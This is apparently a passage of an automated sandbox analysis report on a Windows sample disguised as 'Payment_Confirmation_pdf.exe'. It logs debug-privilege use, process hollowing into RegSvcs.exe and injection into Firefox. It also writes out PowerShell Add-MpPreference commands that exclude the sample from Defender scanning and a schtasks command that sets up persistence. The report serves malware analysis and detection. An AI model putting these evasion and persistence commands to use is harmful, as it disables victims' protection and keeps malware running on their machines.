                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014ACBF0 mov eax, dword ptr fs:[00000030h]10_2_014ACBF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430BBE mov eax, dword ptr fs:[00000030h]10_2_01430BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430BBE mov eax, dword ptr fs:[00000030h]10_2_01430BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]10_2_01426A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430A5B mov eax, dword ptr fs:[00000030h]10_2_01430A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430A5B mov eax, dword ptr fs:[00000030h]10_2_01430A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]10_2_0145CA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]10_2_0145CA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]10_2_0145CA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149CA72 mov eax, dword ptr fs:[00000030h]10_2_0149CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149CA72 mov eax, dword ptr fs:[00000030h]10_2_0149CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014ACA11 mov eax, dword ptr fs:[00000030h]10_2_014ACA11
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145CA24 mov eax, dword ptr fs:[00000030h]10_2_0145CA24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144EA2E mov eax, dword ptr fs:[00000030h]10_2_0144EA2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01444A35 mov eax, dword ptr fs:[00000030h]10_2_01444A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01444A35 mov eax, dword ptr fs:[00000030h]10_2_01444A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145CA38 mov eax, dword ptr fs:[00000030h]10_2_0145CA38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]10_2_01476ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]10_2_01476ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]10_2_01476ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420AD0 mov eax, dword ptr fs:[00000030h]10_2_01420AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01454AD0 mov eax, dword ptr fs:[00000030h]10_2_01454AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01454AD0 mov eax, dword ptr fs:[00000030h]10_2_01454AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145AAEE mov eax, dword ptr fs:[00000030h]10_2_0145AAEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145AAEE mov eax, dword ptr fs:[00000030h]10_2_0145AAEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]10_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4A80 mov eax, dword ptr fs:[00000030h]10_2_014F4A80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01458A90 mov edx, dword ptr fs:[00000030h]10_2_01458A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428AA0 mov eax, dword ptr fs:[00000030h]10_2_01428AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428AA0 mov eax, dword ptr fs:[00000030h]10_2_01428AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01476AA4 mov eax, dword ptr fs:[00000030h]10_2_01476AA4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]10_2_01420D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]10_2_01420D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]10_2_01420D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]10_2_01428D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]10_2_01428D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]10_2_01428D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]10_2_01428D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]10_2_01428D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B8D6B mov eax, dword ptr fs:[00000030h]10_2_014B8D6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]10_2_0143AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]10_2_0143AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]10_2_0143AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]10_2_01416D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]10_2_01416D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]10_2_01416D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01454D1D mov eax, dword ptr fs:[00000030h]10_2_01454D1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D8D10 mov eax, dword ptr fs:[00000030h]10_2_014D8D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D8D10 mov eax, dword ptr fs:[00000030h]10_2_014D8D10
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtMapViewOfSection: Direct from: 0x77762D1C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtUnmapViewOfSection: Direct from: 0x77762D3CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtNotifyChangeKey: Direct from: 0x77763C2C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtCreateMutant: Direct from: 0x777635CC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtResumeThread: Direct from: 0x777636AC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtProtectVirtualMemory: Direct from: 0x77757B2E
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQuerySystemInformation: Direct from: 0x77762DFC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtAllocateVirtualMemory: Direct from: 0x77762BFC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtDelayExecution: Direct from: 0x77762DDC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQueryInformationProcess: Direct from: 0x77762C26
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtOpenKeyEx: Direct from: 0x77763C9C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtSetInformationThread: Direct from: 0x77762B4C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQueryAttributesFile: Direct from: 0x77762E6C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtClose: Direct from: 0x77762B6C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtCreateKey: Direct from: 0x77762C6C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQuerySystemInformation: Direct from: 0x777648CC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtOpenSection: Direct from: 0x77762E0C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtDeviceIoControlFile: Direct from: 0x77762AEC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQueryValueKey: Direct from: 0x77762BEC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtSetInformationThread: Direct from: 0x77762ECC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtQueryInformationToken: Direct from: 0x77762CAC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtTerminateThread: Direct from: 0x77762FCC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtCreateFile: Direct from: 0x77762FEC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtOpenFile: Direct from: 0x77762DCC
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtOpenKeyEx: Direct from: 0x77762B9C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtSetInformationProcess: Direct from: 0x77762C5C
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeNtProtectVirtualMemory: Direct from: 0x77762F9C
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: read write
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeThread register set: target process: 1180
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeThread APC queued: target process: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 87C008Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                      Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
